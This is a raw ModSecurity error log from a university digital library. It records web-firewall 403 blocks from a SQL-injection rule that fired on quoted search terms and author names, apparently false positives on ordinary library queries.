[Mon Aug 28 14:30:16.302722 2023] [:error] [pid 45036] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Accrual accounting\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxNCMCo-f0AAK-sUKsAAAAD"]
[Mon Aug 28 14:32:45.486573 2023] [:error] [pid 45071] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PURWANEGARA, DJUMHANA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxNncCo-f0AALAPFa4AAAAD"]
[Mon Aug 28 14:34:14.778772 2023] [:error] [pid 45115] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Mental health\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxN9sCo-f0AALA7jGgAAAAK"]
[Mon Aug 28 14:47:49.277174 2023] [:error] [pid 45371] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22CLEMENT, P. ROBIN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxRJcCo-f0AALE7cogAAAAG"]
[Mon Aug 28 14:50:35.664196 2023] [:error] [pid 45439] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22AUDITING\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxRy8Co-f0AALF-Pf0AAAAE"]
[Mon Aug 28 14:53:27.935175 2023] [:error] [pid 45453] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Electronic word-of-mouth\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxSd8Co-f0AALGN32kAAAAT"]
[Mon Aug 28 14:54:58.232942 2023] [:error] [pid 45502] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Manajemen Sumber Daya Manusia\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxS0sCo-f0AALG@DGYAAAAD"]
[Mon Aug 28 14:54:59.811484 2023] [:error] [pid 45450] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22CHANEY, K. PAUL\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxS08Co-f0AALGKGJgAAAAQ"]
[Mon Aug 28 15:00:48.465455 2023] [:error] [pid 45617] [client 85.208.96.204] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PAULUS, Y.E.F.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxUMMCo-f0AALIxNCUAAAAM"]
[Mon Aug 28 15:02:12.114961 2023] [:error] [pid 45625] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MARDIASMO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxUhMCo-f0AALI5MLQAAAAP"]
[Mon Aug 28 15:08:37.559203 2023] [:error] [pid 45632] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Stanley Y.B. Huang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxWBcCo-f0AALJAJ30AAAAI"]
[Mon Aug 28 15:08:45.351049 2023] [:error] [pid 45686] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Stefan Schaltegger\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxWDcCo-f0AALJ27ZEAAAAV"]
[Mon Aug 28 15:21:04.633640 2023] [:error] [pid 46043] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rahul Govind\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxY8MCo-f0AALPbHQAAAAAD"]
[Mon Aug 28 15:23:08.398832 2023] [:error] [pid 46088] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jukka Sihvonen\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxZbMCo-f0AALQItGoAAAAO"]
[Mon Aug 28 15:25:26.268376 2023] [:error] [pid 46087] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Manufacturing industries, Service industries, Busi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxZ9sCo-f0AALQHkboAAAAN"]
[Mon Aug 28 15:28:21.244996 2023] [:error] [pid 46208] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Strategy\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxapcCo-f0AALSArp8AAAAC"]
[Mon Aug 28 15:31:43.801335 2023] [:error] [pid 46248] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN PEMASARAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxbb8Co-f0AALSo3OAAAAAN"]
[Mon Aug 28 15:38:43.573444 2023] [:error] [pid 46407] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Cynthia Afriani Utama\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxdE8Co-f0AALVHq-8AAAAD"]
[Mon Aug 28 15:47:44.570487 2023] [:error] [pid 46604] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Dina Rosdiana\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxfMMCo-f0AALYM1vUAAAAP"]
[Mon Aug 28 15:54:53.447455 2023] [:error] [pid 46749] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Auditors characteristics\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxg3cCo-f0AALadN8cAAAAJ"]
[Mon Aug 28 16:15:48.869858 2023] [:error] [pid 47124] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Pablo Cabanelas\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxlxMCo-f0AALgU9VMAAAAI"]
[Mon Aug 28 16:34:09.247360 2023] [:error] [pid 47317] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Marisi Butarbutar Efendi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxqEcCo-f0AALjVnFQAAAAE"]
[Mon Aug 28 16:37:15.776752 2023] [:error] [pid 47336] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Muhammad Al-Musadieq\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxqy8Co-f0AALjoz94AAAAQ"]
[Mon Aug 28 16:50:49.907388 2023] [:error] [pid 47596] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Abu Amar Fauzi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxt@cCo-f0AALnspn8AAAAM"]
[Mon Aug 28 16:53:06.439890 2023] [:error] [pid 47925] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sulastri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxugsCo-f0AALs1giQAAAAQ"]
[Mon Aug 28 17:04:08.650438 2023] [:error] [pid 48053] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22MANAJEMEN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxxGMCo-f0AALu1gLUAAAAR"]
[Mon Aug 28 17:08:03.005123 2023] [:error] [pid 48123] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Buyer\\xe2\\x80\\x93seller relationships\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxyA8Co-f0AALv7jIAAAAAD"]
[Mon Aug 28 17:08:33.137288 2023] [:error] [pid 48123] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Des Prasetya Kurnia Widodo\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id 